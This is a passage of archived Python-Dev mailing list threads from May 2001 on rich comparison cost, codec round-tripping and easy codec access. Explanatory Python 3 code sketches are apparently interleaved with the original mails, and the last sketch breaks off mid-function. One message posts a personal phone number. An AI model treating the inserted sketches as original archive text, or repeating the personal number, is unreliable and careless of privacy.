Note too my earlier mail about how adding a richcmp slot to strings will
suddenly slow cmp(string1, string2) (which is the usual way to program a
search tree, because cmp() *used* to call a string comparison routine only
once; but after adding a richcmp slot, each cmp(string1, string2) will call
the richcmp slot from 1 thru 3 times (data-dependent)).
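The following Python 3 model shows the cost of a three-way comparison when a type offers only rich comparisons: cmp() has to probe them one at a time. The sketch tries ==, then <, then >, and that order is an assumption made for illustration. A single three-way comparison therefore costs one to three rich comparisons, depending on the data. three_way_cmp and Probe are hypothetical names.

```python
class Probe:
    """Hypothetical value type that counts the rich comparisons made on it."""
    calls = 0

    def __init__(self, value):
        self.value = value

    def __eq__(self, other):
        Probe.calls += 1
        return self.value == other.value

    def __lt__(self, other):
        Probe.calls += 1
        return self.value < other.value

    def __gt__(self, other):
        Probe.calls += 1
        return self.value > other.value

def three_way_cmp(a, b):
    """Derive -1/0/1 from rich comparisons, trying ==, <, > in turn."""
    if a == b:
        return 0
    if a < b:
        return -1
    if a > b:
        return 1
    raise TypeError("values are unordered")

def cost(x, y):
    """Return (three-way result, number of rich comparisons used)."""
    Probe.calls = 0
    result = three_way_cmp(Probe(x), Probe(y))
    return result, Probe.calls

print(cost("b", "b"))  # (0, 1)
print(cost("a", "b"))  # (-1, 2)
print(cost("c", "b"))  # (1, 3)
```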

> ...
> That shows that optimizing for Py_NE is not worth it. With these data,
> I'll upload a patch to SF.

Which is here:

http://sourceforge.net/tracker/index.php?func=detail&aid=424335&group_id=5470&atid=305470

Heh:  let's grab all the ugly URLs off of SourceForge, stick them in a giant
list, and sort them.  Can't think of a more typical app than that <wink>.

Thanks for the work, Martin!


From tim.one@home.com  Wed May 16 09:51:17 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 04:51:17 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.46090.203278.397835@anthem.wooz.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEHPKCAA.tim.one@home.com>

[Barry A. Warsaw]
> ...
> from types import StringType
> import time
> r = range(1000000)
>
> def one(r=r):
>     x = 'hello'
>     t0 = time.time()
>     for i in r:

Random clue:  when you're too lazy to try to subtract out loop overhead (not a
knock, I am too), you may have better luck with

    r = [1] * 1000000

than

    r = range(1000000)

The reason is that the former way gets to keep incref'ing and decref'ing a
single object (as it's repeatedly bound to "i" across iterations), instead of
slobbering all over memory inc'ing and dec'ing a million distinct objects.
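The effect can be checked in Python 3. [1] * n holds n references to one object. A list built from range(n) holds n distinct int objects, because each value is its own object. The minimal sketch below checks this, then times an empty loop over each list with timeit. Absolute timings depend on the machine and are printed only for comparison.

```python
import timeit

n = 100_000
same = [1] * n
distinct = list(range(n))

# Count distinct objects by identity.
print(len({id(x) for x in same}))      # 1
print(len({id(x) for x in distinct}))  # 100000

def empty_loop(seq):
    for i in seq:
        pass

for name, seq in [("[1] * n", same), ("list(range(n))", distinct)]:
    best = min(timeit.repeat(lambda: empty_loop(seq), number=5, repeat=3))
    print(f"{name:>15}: {best:.4f} s for 5 passes")
```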

there's-an-art-to-doing-nothing-quickly-ly y'rs  - tim


From tim.one@home.com  Wed May 16 09:56:56 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 04:56:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010515222738.A9996@thyrsus.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEHPKCAA.tim.one@home.com>

[poor Tim]
> In Python terms, those are Pythong lon (unbounded) ints today
                             ^^^^^^^
[Greg Ewing]
> What Pythonistas wear on their feet?

[Eric S. Raymond]
> No, man.  It's what sexy lady Pythonistas wear on the beach in Rio.

Eric wins!  That's indeed what I was thinking of.  I'm surprised nobody asked
what a lon was.  But not as surprised that I didn't try to blame this on an
Outlook 2000 bug.

> (Yes, I know some sexy lady Pythonistas.  No, you can't have their
> phone numbers.  Pthfthfthpht...)

Too much work anyway.  They can have mine:  703 758 8258.

but-they-better-*really*-love-python-cuz-i-give-quizzes-ly y'rs  - tim


From esr@thyrsus.com  Wed May 16 10:17:09 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 16 May 2001 05:17:09 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEHPKCAA.tim.one@home.com>; from tim.one@home.com on Wed, May 16, 2001 at 04:56:56AM -0400
References: <20010515222738.A9996@thyrsus.com> <LNBBLJKPBEHFEDALKOLCKEHPKCAA.tim.one@home.com>
Message-ID: <20010516051709.C11602@thyrsus.com>

Tim Peters <tim.one@home.com>:
> [poor Tim]
> > In Python terms, those are Pythong lon (unbounded) ints today
>                              ^^^^^^^
> [Greg Ewing]
> > What Pythonistas wear on their feet?
> 
> [Eric S. Raymond]
> > No, man.  It's what sexy lady Pythonistas wear on the beach in Rio.
> 
> Eric wins!  That's indeed what I was thinking of.  I'm surprised nobody asked
> what a lon was.  But not as surprised that I didn't try to blame this on an
> Outlook 2000 bug.
> 
> > (Yes, I know some sexy lady Pythonistas.  No, you can't have their
> > phone numbers.  Pthfthfthpht...)
> 
> Too much work anyway.  They can have mine:  703 758 8258.

Hmmm...now, which one of them should I try to talk into a snakeskin bikini?

Duh.  Answer obvious: the one I can talk *out* of a snakeskin bikini most 
rapidly afterwards.  Then I'll give her your number -- that is, if
I don't get too, er, distracted.

	seeming-like-a-good-time-to-practice-my-Timlike-wink'ly yours,
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Every Communist must grasp the truth, 'Political power grows out of
the barrel of a gun.'
        -- Mao Tse-tung, 1938, inadvertently endorsing the Second Amendment.


From mal@lemburg.com  Wed May 16 10:29:49 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:29:49 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCGEHLKCAA.tim.one@home.com>
Message-ID: <3B02488D.415BA95F@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > Round-tripping is obviously very important if you use Unicode
> > as basis for working on text.
> 
> Since I use 7-bit ASCII exclusively, I've been using
> 
>     encode = decode = lambda x: x
> 
> I haven't proved that's round-trippable, but haven't bumped into an exception
> yet.

For character map codecs the complete range(256) of possible
input characters should pass the round-trip test, that is

	encoded text -> Unicode -> encoded text

should result in the identity mapping for all c in map(chr,range(256)).
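The round-trip requirement can be written as a short check. This Python 3 sketch assumes a character map codec described by a plain dict from byte value to Unicode code point. The toy map below is hypothetical and does not come from any real codec. The encoding direction is derived by naively inverting the decoding map, so when several bytes share a target the last one silently wins.

```python
def round_trip_failures(decoding_map):
    """Return the byte values that do not survive bytes -> Unicode -> bytes."""
    # Naive inversion: if several bytes decode to the same code point,
    # the last one seen becomes the inverse entry.
    encoding_map = {}
    for byte, cp in decoding_map.items():
        encoding_map[cp] = byte

    failures = []
    for byte in range(256):
        cp = decoding_map.get(byte)
        if cp is None or encoding_map.get(cp) != byte:
            failures.append(byte)
    return failures

# Toy map: identity everywhere, except 0x80 and 0x81 also decode to U+001A.
toy_map = {b: b for b in range(256)}
toy_map[0x80] = 0x1A
toy_map[0x81] = 0x1A

# 0x81 "wins" U+001A, so 0x1A and 0x80 come back as 0x81.
print(round_trip_failures(toy_map))  # [26, 128]
```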
 
> > I don't know about the reasoning behind making cp875 fail the
> > round-trip -- Unicode certainly provides means to make mappings
> > round-trip safe (e.g. by reverting to the private Unicode
> > char. point areas).
> 
> Then I ignorantly but confidently (indeed, with the cheery confidence only
> the truly ignorant can truly enjoy!) vote for your approach that maps the
> non-round-trippable cp875 code points to None.  Better safe than sorry, by
> default.  Else 6 of the 7 ambiguous chars will be silent surprises by
> default.

I will check in a patch which moves the building logic for encoding
maps to codecs.py. This will simplify the task of choosing the
"right" solution. Currently I'm in favour of:

def make_encoding_map(decoding_map):

    """ Creates an encoding map from a decoding map.

        If a target mapping in the decoding map occurs multiple
        times, then that target is mapped to None (undefined mapping),
        causing an exception when encountered by the charmap codec
        during translation.

        One example where this happens is cp875.py which decodes
        multiple characters to \u001a.

    """
    m = {}
    for k,v in decoding_map.items():
        if not m.has_key(v):
            m[v] = k
        else:
            m[v] = None
    return m

Perhaps we should also have a codecs.finalize_decoding_map() API
in codecs.py which checks the decoding map and postprocesses
it in case it finds a problem ?!
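The function above uses dict.has_key(), which no longer exists in Python 3. What follows is a sketch of the same logic ported to Python 3 and applied to a hypothetical toy decoding map. The resulting encoding map is passed to codecs.charmap_encode(), which the stdlib's charmap-based codec modules use. A None entry makes the strict charmap encoder raise instead of guessing.

```python
import codecs

def make_encoding_map(decoding_map):
    """Python 3 port: targets occurring more than once map to None."""
    m = {}
    for k, v in decoding_map.items():
        if v not in m:
            m[v] = k
        else:
            m[v] = None
    return m

# Toy decoding map (hypothetical): bytes 0x41 and 0x42 both decode to U+001A.
decoding_map = {0x41: 0x1A, 0x42: 0x1A, 0x43: 0x43}
encoding_map = make_encoding_map(decoding_map)
print(encoding_map)                                        # {26: None, 67: 67}

print(codecs.charmap_encode("C", "strict", encoding_map))  # (b'C', 1)
try:
    codecs.charmap_encode("\x1a", "strict", encoding_map)
except UnicodeEncodeError as exc:
    print("undefined:", exc.reason)
```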

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Wed May 16 10:32:36 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:32:36 +0200
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
 <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
 <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>
Message-ID: <3B024934.58232325@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > Sounds like we ought to do a search-and-destroy on type comparisons,
> > replacing with isinstance() where possible.
> 
> At least in my applications, this is unfortunately not possible: I
> want a test for byte-string-or-unicode-string. This could be done with
> two isinstance calls, but that is certainly less efficient.
> 
> Marc-Andre once proposed a type representing the immediate supertype
> of both byte strings and unicode strings; let's call it abstract string.
> Then I could write isinstance(e, types.AbstractString).

I'm still holding on to that idea... hopefully, Guido's type
checkins will make this possible in 2.2 or 2.3. The same
should then be done for numbers, sequences and mappings (all
abstract "types" defined in abstract.c).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Wed May 16 10:34:40 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:34:40 +0200
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>
Message-ID: <3B0249B0.5DD10A4C@lemburg.com>

Tim Peters wrote:
> 
> [Martin]
> > Producing numbers is easy :-)
> 
> If only making sense of them were too <0.6 wink>.

FYI, I've added a few compare tests to pybench which now is
available as version 0.9. You can download it from my Python
page.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mwh@python.net  Wed May 16 11:53:16 2001
From: mwh@python.net (Michael Hudson)
Date: 16 May 2001 11:53:16 +0100
Subject: [Python-Dev] Easy codec access
In-Reply-To: Guido van Rossum's message of "Tue, 15 May 2001 11:35:09 -0500"
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com>
Message-ID: <m31yppo99f.fsf@atrus.jesus.cam.ac.uk>

Guido van Rossum <guido@digicool.com> writes:

> > I've just checked in a set of patches which implement the new
> > .decode() method along with a couple of useful codecs.
> 
> Cool!

Indeed.  Good idea, Marc!

This is a bit unfriendly though:

>>> "bobbins".encode("gzip")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
    raise SystemError,\
SystemError: module "encodings.gzip" failed to register

I thought SystemErrors shouldn't ever happen (isn't it what gets
raised for an illegal opcode, for example?).
 
> > To see just how easy it is to write codecs, please have
> > a look at the string codecs I added in this patch (e.g.
> > zlib_codec.py or hex_codec.py). I am pretty sure that there
> > are a lot more useful things in the standard lib which could
> > benefit from these easy-to-use interfaces.
> 
> As an exercise, I added a quoted-printable codec.  It was easy
> indeed!

urlencode would be nice.  Maybe re.escape, too.  html entities?
That's probably a bigger can of worms, but 

print "<p>%s</p>"%text.encode("html")

seems delightfully simpleminded.
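The "html" idea can be sketched on top of the codec registry in Python 3, under several assumptions. The codec name html_escape_demo is hypothetical. The actual work is delegated to the standard html.escape() and html.unescape(). Python 3's str.encode() requires bytes output, so this str-to-str transform is called through codecs.encode() and codecs.decode() instead.

```python
import codecs
import html

def _encode(text, errors="strict"):
    # Codec functions return (output, length consumed).
    return html.escape(text), len(text)

def _decode(text, errors="strict"):
    return html.unescape(text), len(text)

def _search(name):
    # The registry calls this with a normalized, lower-case name.
    if name == "html_escape_demo":
        return codecs.CodecInfo(_encode, _decode, name="html_escape_demo")
    return None

codecs.register(_search)

text = 'Fish & "Chips" <cheap>'
escaped = codecs.encode(text, "html_escape_demo")
print("<p>%s</p>" % escaped)
print(codecs.decode(escaped, "html_escape_demo") == text)  # True
```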

Cheers,
M.

-- 
  GAG: I think this is perfectly normal behaviour for a Vogon. ...
VOGON: That is exactly what you always say.
  GAG: Well, I think that is probably perfectly normal behaviour for a
      psychiatrist. -- The Hitch-Hikers Guide to the Galaxy, Episode 9


From mal@lemburg.com  Wed May 16 12:06:14 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 13:06:14 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <m31yppo99f.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3B025F26.A625DE02@lemburg.com>

Michael Hudson wrote:
> 
> Guido van Rossum <guido@digicool.com> writes:
> 
> > > I've just checked in a set of patches which implement the new
> > > .decode() method along with a couple of useful codecs.
> >
> > Cool!
> 
> Indeed.  Good idea, Marc!

Thanks :-)
 
> This is a bit unfriendly though:
> 
> >>> "bobbins".encode("gzip")
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
>   File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
>     raise SystemError,\
> SystemError: module "encodings.gzip" failed to register
> 
> I thought SystemErrors shouldn't ever happen (isn't it what gets
> raised for an illegal opcode, for example?).

This is due to the zlib module not being installed. The reason
for the search function in encodings/__init__.py raising a
SystemError is that it did find a module named gzip, but this
module does not export the needed registration API getregentry().

Perhaps it should just raise a LookupError instead, though...
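The suggestion can be sketched in Python 3 terms. Suppose the search function returns None for a module that lacks getregentry(). The codec registry then reports an ordinary LookupError ("unknown encoding") instead of a SystemError. The function below is hypothetical and much simpler than the real encodings.search_function. It only looks inside the encodings package and ignores aliases.

```python
import importlib

def search_function(encoding):
    """Hypothetical, simplified codec search function."""
    try:
        mod = importlib.import_module("encodings." + encoding)
    except ImportError:
        return None          # no such module: unknown encoding
    getregentry = getattr(mod, "getregentry", None)
    if getregentry is None:
        return None          # module exists but is not a codec
    return getregentry()

print(search_function("utf_8").name)  # utf-8
print(search_function("nonesuch"))    # None
print(search_function("aliases"))     # None: a helper module, not a codec
```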
 
> > > To see just how easy it is to write codecs, please have
> > > a look at the string codecs I added in this patch (e.g.
> > > zlib_codec.py or hex_codec.py). I am pretty sure that there
> > > are a lot more useful things in the standard lib which could
> > > benefit from these easy-to-use interfaces.
> >
> > As an exercise, I added a quoted-printable codec.  It was easy
> > indeed!
> 
> urlencode would be nice.  Maybe re.escape, too.  html entities?
> That's probably a bigger can of worms, but
> 
> print "<p>%s</p>"%text.encode("html")
> 
> seems delightfully simpleminded.

Right. That's the idea... volunteers are welcome :-) 

There are lots of those little "escape this, encode that" tasks 
which could benefit from the codec machinery. The ones you
mention would certainly be good candidates. pickle and marshal
would also be good to have wrapped as codecs.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mwh@python.net  Wed May 16 12:19:15 2001
From: mwh@python.net (Michael Hudson)
Date: 16 May 2001 12:19:15 +0100
Subject: [Python-Dev] Easy codec access
In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 16 May 2001 13:06:14 +0200"
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <m31yppo99f.fsf@atrus.jesus.cam.ac.uk> <3B025F26.A625DE02@lemburg.com>
Message-ID: <m3y9rxmtho.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal@lemburg.com> writes:

> > This is a bit unfriendly though:
> > 
> > >>> "bobbins".encode("gzip")
> > Traceback (most recent call last):
> >   File "<stdin>", line 1, in ?
> >   File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
> >     raise SystemError,\
> > SystemError: module "encodings.gzip" failed to register
> > 
> > I thought SystemErrors shouldn't ever happen (isn't it what gets
> > raised for an illegal opcode, for example?).
> 
> This is due to the zlib module not being installed. 

No it's not, actually.  I *thought* I was getting the error message
because the zlib encoding doesn't alias itself to gzip (whether it
should or not is another question).  But in fact if you specify a
bogus encoding you get a nice error message:

>>> "bobbins".encode("nonesuch")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
LookupError: unknown encoding

but:

>>> "bobbins".encode("sys")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
    raise SystemError,\
SystemError: module "encodings.sys" failed to register

I have to admit I don't really know what's going on here, but the
error is just confusing.

> The reason for the search function in encodings/__init__.py raising
> a SystemError is that it did find a module named gzip, but this
> module does not export the needed registration API getregentry().

Yep.  

> Perhaps it should just raise a LookupError instead, though...

Might be easiest.

> > urlencode would be nice.  Maybe re.escape, too.  html entities?
> > That's probably a bigger can of worms, but
> > 
> > print "<p>%s</p>"%text.encode("html")
> > 
> > seems delightfully simpleminded.
> 
> Right. That's the idea... volunteers are welcome :-) 

Maybe this evening.

> There are lots of those little "escape this, encode that" tasks 
> which could benefit from the codec machinery. The ones you
> mention would certainly be good candidates. pickle and marshal
> would also be good to have wrapped as codecs.

Ooh yes, hadn't thought of them.

'YW5vdGhlci1mdW4tdG95\n'.decode("base64")-ly y'rs
M.

-- 
  There's an aura of unholy black magic about CLISP.  It works, but
  I have no idea how it does it.  I suspect there's a goat involved
  somewhere.                     -- Johann Hibschman, comp.lang.scheme


From aahz@rahul.net  Wed May 16 14:16:18 2001
From: aahz@rahul.net (Aahz Maruch)
Date: Wed, 16 May 2001 06:16:18 -0700 (PDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010515222738.A9996@thyrsus.com> from "Eric S. Raymond" at May 15, 2001 10:27:38 PM
Message-ID: <20010516131618.C40CC99C91@waltz.rahul.net>

Eric S. Raymond wrote:
> 
> (Yes, I know some sexy lady Pythonistas.  No, you can't have their
> phone numbers.  Pthfthfthpht...)

That's okay, I have their e-mail addresses.  Wanna bet on which of us
gets a response first?
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From barry@digicool.com  Wed May 16 14:42:15 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Wed, 16 May 2001 09:42:15 -0400
Subject: [Python-Dev] Comparison speed
References: <15105.46090.203278.397835@anthem.wooz.org>
 <LNBBLJKPBEHFEDALKOLCAEHPKCAA.tim.one@home.com>
Message-ID: <15106.33719.14403.13051@anthem.wooz.org>

>>>>> "TP" == Tim Peters <tim.one@home.com> writes:

    TP> Random clue: when you're too lazy to try to subtract out loop
    TP> overhead (not a knock, I am too), you may have better luck
    TP> with

    TP>     r = [1] * 1000000

    TP> than

    TP>     r = range(1000000)

Ah, good point!
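The loop-overhead subtraction Tim mentions can be sketched with the modern timeit module. This is a rough sketch, not a benchmark harness. The function name net_cost_per_item, the default setup string and the sizes are illustrative assumptions. Both loops walk r = [1] * n, following Tim's suggestion, and the empty loop's time is subtracted from the loop containing the statement being measured.

```python
import timeit

def net_cost_per_item(body, setup="a, b = 'ab', 'cd'", n=100_000, repeat=5):
    """Rough per-iteration cost of `body`, with empty-loop overhead subtracted.

    Both loops walk r = [1] * n (one shared object repeated n times).
    """
    full_setup = setup + "\nr = [1] * %d" % n
    empty_loop = "for _ in r:\n    pass"
    body_loop = "for _ in r:\n    " + body
    # The minimum of several runs is the least noisy estimate.
    empty = min(timeit.repeat(empty_loop, full_setup, repeat=repeat, number=1))
    full = min(timeit.repeat(body_loop, full_setup, repeat=repeat, number=1))
    return (full - empty) / n

print("about %.1f ns per 'a < b'" % (net_cost_per_item("a < b") * 1e9))
```

The result can come out slightly negative on a noisy machine, which is itself a hint that the measured operation is close to the loop overhead.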


From guido@digicool.com  Wed May 16 16:01:40 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 10:01:40 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Wed, 16 May 2001 09:28:45 +0200."
 <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com> <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com>
 <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>
Message-ID: <200105161501.KAA02226@cj20424-a.reston1.va.home.com>

> Marc-Andre once proposed a type representing the immediate supertype
> of both byte strings and unicode strings; let's call it abstract string.
> Then I could write isinstance(e, types.AbstractString).

This will probably be doable in 2.2.
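In Python 3 there is no dedicated built-in supertype of just str and bytes. A minimal sketch of the proposed check uses a hypothetical AbstractString abstract base class and registers both string types with it. The name AbstractString comes from the quoted proposal, but this class is illustrative, not part of any library.

```python
from abc import ABC

class AbstractString(ABC):
    """Hypothetical stand-in for the proposed types.AbstractString."""

# Registration makes isinstance() succeed without changing the real types.
AbstractString.register(str)
AbstractString.register(bytes)

def is_string(e):
    return isinstance(e, AbstractString)
```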

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Wed May 16 16:24:55 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 10:24:55 -0500
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: Your message of "Tue, 15 May 2001 20:01:05 -0400."
 <LNBBLJKPBEHFEDALKOLCGEGMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCGEGMKCAA.tim.one@home.com>
Message-ID: <200105161524.KAA02518@cj20424-a.reston1.va.home.com>

> The question remaining is how much of this list/tuple richcmp behavior is
> guaranteed by the language and how much is just implementation-dependent
> fuzz.

Unclear what you're asking.  The language doesn't require any
particular semantics for sequence comparisons, but the language of
course includes the tuple and list sequence types, and it describes
(albeit lacking some rigorous detail) what comparisons for those do.
If there are specific lacks of detail, it probably helps to think
about filling those in.

> For a more vanilla example, I removed the EQ/NE "lengths differ?"
> tuple richcmp early-exit test because I never found code that made
> it trigger (but tons of code that gets there without triggering).
> But this has semantic implications too: an implementation without
> the early exit may call user-defined comparison routines that raise
> exceptions when comparing tuples of different lengths now.  Do you
> care?  (I don't.)

I don't care about exceptions either in this case; the shortcut seems
fair game.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com (Skip Montanaro)  Wed May 16 15:28:04 2001
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 16 May 2001 09:28:04 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B025F26.A625DE02@lemburg.com>
References: <3B011CA8.9DDB4FC7@lemburg.com>
 <200105151635.LAA29530@cj20424-a.reston1.va.home.com>
 <m31yppo99f.fsf@atrus.jesus.cam.ac.uk>
 <3B025F26.A625DE02@lemburg.com>
Message-ID: <15106.36468.62292.611515@beluga.mojam.com>

    mal> pickle and marshal would also be good to have wrapped as codecs.

Why?  They operate on much more than strings.

-- 
Skip Montanaro (skip@pobox.com)
(847)971-7098


From fredrik@effbot.org  Wed May 16 16:07:18 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Wed, 16 May 2001 17:07:18 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><m31yppo99f.fsf@atrus.jesus.cam.ac.uk><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com>
Message-ID: <002101c0de19$e7875a90$e46940d5@hagrid>

skip wrote:

>     mal> pickle and marshal would also be good to have wrapped as codecs.
> 
> Why?  They operate on much more than strings.

hypergeneralization, of course.

more candidates:

    "10".decode("int")
    "10.0".decode("float")
    "[1, 2, 3]".decode("list")
    "readme.txt".decode("file")
    "SyntaxError".decode("raise")
    (etc)

Cheers /F


From nas@python.ca  Wed May 16 17:19:42 2001
From: nas@python.ca (Neil Schemenauer)
Date: Wed, 16 May 2001 09:19:42 -0700
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 14, 2001 at 09:40:21PM +0200
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>
Message-ID: <20010516091942.A16455@glacier.fnational.com>

Martin v. Loewis wrote:
> In any case, I think you need to analyse this in a debugger.

#7  0x080bc17e in tupletraverse (o=0x8154914, visit=0x807d640 <visit_decref>, 
    arg=0x0) at ../Objects/tupleobject.c:366
366                             err = visit(x, arg);
(gdb) p *o
$11 = {ob_refcnt = 1, ob_type = 0x80eb5a0, ob_size = 1, ob_item = {0x402c5180}}
(gdb) p *o->ob_item[0]
$12 = {ob_refcnt = 2, ob_type = 0x0}

In other words the GC is finding a tuple object that contains an
element with a funny looking address (data segment?) and an
ob_type of NULL.  The collector has started running from here:

#10 0x0807debc in collect_generations () at ../Modules/gcmodule.c:467
#11 0x0807dfc4 in _PyGC_Insert (op=0x819f57c) at ../Modules/gcmodule.c:507
#12 0x080af56a in PyDict_New () at ../Objects/dictobject.c:149
#13 0x0808d8b8 in getBaseDictionary (type=0x402bcc40)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1249
#14 0x0808eb45 in initializeBaseExtensionClass (self=0x402bcc40)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1495
#15 0x08095fb1 in export_subclassed_type (dict=0x81851fc, 
    name=0x402a9388 "GdkDragContext", typ=0x402bcc40, bases=0x816fc34)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:3451
#16 0x400194ac in pygobject_register_class (dict=0x81851fc, 
    class_name=0x402a9388 "GdkDragContext", 
    get_type=0x404d5c50 <gdk_drag_context_get_type>, ec=0x402bcc40, 
    bases=0x816fc34) at gobjectmodule.c:202
#17 0x402a55fd in pygtk_register_classes (d=0x81851fc) at gtk.c:31844
#18 0x40257004 in init_gtk () at gtkmodule.c:98

I don't have time to dig deeper into this right now but perhaps
this will help someone.

  Neil


From mal@lemburg.com  Wed May 16 17:24:57 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 18:24:57 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><m31yppo99f.fsf@atrus.jesus.cam.ac.uk><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> <002101c0de19$e7875a90$e46940d5@hagrid>
Message-ID: <3B02A9D9.113836D6@lemburg.com>

Fredrik Lundh wrote:
> 
> skip wrote:
> 
> >     mal> pickle and marshal would also be good to have wrapped as codecs.
> >
> > Why?  They operate on much more than strings.

Of course. 

Still their basic task is to take an object and
encode it in some way for dumps() and do the reverse for loads().
That's pretty much what codecs normally do ;-)

I wasn't referring to the use of pickle and marshal with string.encode()
and .decode(), even though you could then decode a pickle using
"pickledata".decode("pickle") and get back the object.

These two are very useful though when it comes to using codecs
for file wrappers:

f = codecs.open('mypicklfile', mode='wb', encoding='pickle')
f.write((123, 'abc', 456.789))
f.close()

f = codecs.open('mypicklfile', mode='rb', encoding='pickle')
t = f.read()
f.close()
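The core of such a pickle codec can be sketched with codecs.register(). This is a minimal sketch, assuming Python 3. The codec name pickle_sketch and the helper functions are hypothetical; no pickle codec ships with Python. It stops at codecs.encode() and codecs.decode(). Making codecs.open() work as in the example above would also need StreamReader/StreamWriter classes, which are not shown here.

```python
import codecs
import pickle

# Hypothetical codec name for this sketch; no pickle codec ships with Python.
PICKLE_CODEC = "pickle_sketch"

def _pickle_encode(obj, errors="strict"):
    # Codec functions return (output, amount of input consumed);
    # here one whole object is consumed.
    return pickle.dumps(obj), 1

def _pickle_decode(data, errors="strict"):
    # Never unpickle data that comes from an untrusted source.
    return pickle.loads(data), len(data)

def _pickle_search(name):
    if name == PICKLE_CODEC:
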